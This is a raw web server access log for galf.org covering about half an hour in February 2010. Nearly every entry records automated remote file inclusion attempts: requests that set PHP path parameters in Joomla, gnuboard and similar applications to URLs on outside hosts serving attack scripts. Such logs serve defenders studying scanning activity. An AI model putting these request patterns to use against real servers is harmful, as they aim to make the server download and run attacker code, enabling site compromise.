222.122.197.10 - - [28/Feb/2010:20:32:35 -0800] "GET /logs/access_091228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:35 -0800] "GET /logs/access_090928.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:40 -0800] "GET /logs/access_090928.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:32:40 -0800] "GET /logs/access_091228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:32:43 -0800] "GET /logs/access_100201.log%20%20//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:32:43 -0800] "GET /logs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:32:43 -0800] "GET /write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:33:08 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:20:33:08 -0800] "GET /logs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:20:33:08 -0800] "GET /write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:20:33:21 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:20:33:21 -0800] "GET /logs//write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.104.40.170 - - [28/Feb/2010:20:33:21 -0800] "GET /write_update.php?board_skin_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:20:33:43 -0800] "GET /logs/access_100125.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:33:43 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:33:44 -0800] "GET /logs/access_091228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:33:44 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:34:18 -0800] "GET /logs/access_100125.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:34:18 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:34:18 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:34:18 -0800] "GET /logs/access_091228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:34:23 -0800] "GET /logs//port.php?content=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:34:23 -0800] "GET /logs/access_091228.log%20%20//port.php?content=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:34:23 -0800] "GET /port.php?content=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:20:34:58 -0800] "GET /logs/access_100118.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:35:38 -0800] "GET /port.php?content=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:35:39 -0800] "GET /logs/access_091228.log%20%20//port.php?content=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.40.170 - - [28/Feb/2010:20:35:39 -0800] "GET /logs//port.php?content=http://paku1.fileave.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:37:06 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 1050 "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:37:06 -0800] "GET /logs/access_100118.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:37:06 -0800] "GET /logs/access_091005.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:37:09 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 200 4807 "-" "Mozilla/5.0" "www.galf.org"
208.80.193.40 - - [28/Feb/2010:20:38:05 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=50&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {91085478-9F68-1089-9C0E-F121B16FB394}; .NET CLR 1.1.4322)" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:38:11 -0800] "GET /logs/access_091214.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:38:24 -0800] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.224.94.218 - - [28/Feb/2010:20:38:55 -0800] "GET /logs/access.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:39:02 -0800] "GET /logs/access_090928.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:40:31 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:40:32 -0800] "GET /logs/access_091228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:40:32 -0800] "GET /logs/access_100125.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:20:40:32 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.45.121 - - [28/Feb/2010:20:40:37 -0800] "GET /logs/access_100208.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.208.78.90 - - [28/Feb/2010:20:41:10 -0800] "GET /logs/access_100111.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:20:43:20 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:20:45:08 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:20:45:08 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:20:45:14 -0800] "GET /logs/access_100111.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:46:27 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:46:27 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:46:29 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:46:39 -0800] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:46:41 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:46:41 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:46:42 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:46:53 -0800] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:49:43 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:49:43 -0800] "GET /logs/access_091207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:49:43 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:49:54 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:49:54 -0800] "GET /logs/access_091207.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:49:54 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:51:41 -0800] "GET /logs/access_091221.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:20:51:48 -0800] "GET /logs/access_091221.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:51:57 -0800] "GET /bbs2//skin/lyh/setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:51:57 -0800] "GET /logs//bbs2//skin/lyh/setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:51:57 -0800] "GET /logs/access_100118.log%20%20//bbs2//skin/lyh/setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:52:00 -0800] "GET /bbs2//skin/lyh/setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:52:00 -0800] "GET /logs/access_100118.log%20%20//bbs2//skin/lyh/setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:52:00 -0800] "GET /logs//bbs2//skin/lyh/setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:52:10 -0800] "GET /logs/access_100111.log%20%20//bbs2//skin/lyh/setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:52:13 -0800] "GET /logs/access_100111.log%20%20//bbs2//skin/lyh/setup.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [28/Feb/2010:20:52:22 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [28/Feb/2010:20:52:22 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [28/Feb/2010:20:52:22 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [28/Feb/2010:20:52:29 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [28/Feb/2010:20:52:29 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.44.84.221 - - [28/Feb/2010:20:52:29 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:20:52:41 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:20:52:41 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:20:52:41 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:20:52:52 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:20:52:52 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.92.143.92 - - [28/Feb/2010:20:52:52 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.46.39.49 - - [28/Feb/2010:20:53:11 -0800] "GET /logs/access_100118.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [28/Feb/2010:20:53:53 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [28/Feb/2010:20:53:53 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [28/Feb/2010:20:53:53 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [28/Feb/2010:20:53:58 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [28/Feb/2010:20:53:58 -0800] "GET /logs/access_091221.log%20%20//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.132.3 - - [28/Feb/2010:20:53:58 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:55:47 -0800] "GET //index.php?=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:55:47 -0800] "GET /logs/access_090921.log%20%20///index.php?=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:55:47 -0800] "GET /logs///index.php?=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:55:48 -0800] "GET //index.php?=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:55:48 -0800] "GET /logs/access_090921.log%20%20///index.php?=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:55:48 -0800] "GET /logs///index.php?=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:56:26 -0800] "GET /logs/access_090907.log%20%20///index.php?=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:20:56:27 -0800] "GET /logs/access_090907.log%20%20///index.php?=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.230.93.144 - - [28/Feb/2010:21:02:41 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
87.230.93.144 - - [28/Feb/2010:21:02:41 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
87.230.93.144 - - [28/Feb/2010:21:02:42 -0800] "GET /gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
87.230.93.144 - - [28/Feb/2010:21:02:42 -0800] "GET /logs//gnuboard4//bbs/delete_all.php?board.skin.path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:06:08 -0800] "GET /appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:06:08 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:06:08 -0800] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:06:09 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:06:09 -0800] "GET /logs/access_100118.log%20%20//appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.200.203.11 - - [28/Feb/2010:21:06:09 -0800] "GET /appserv/main.php?appserv_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:28 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:28 -0800] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:28 -0800] "GET /logs/access_090928.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:34 -0800] "GET /logs/access_090928.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:34 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:34 -0800] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:37 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:37 -0800] "GET /logs/access_090928.log//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:37 -0800] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.104.46.66 - - [28/Feb/2010:21:07:41 -0800] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
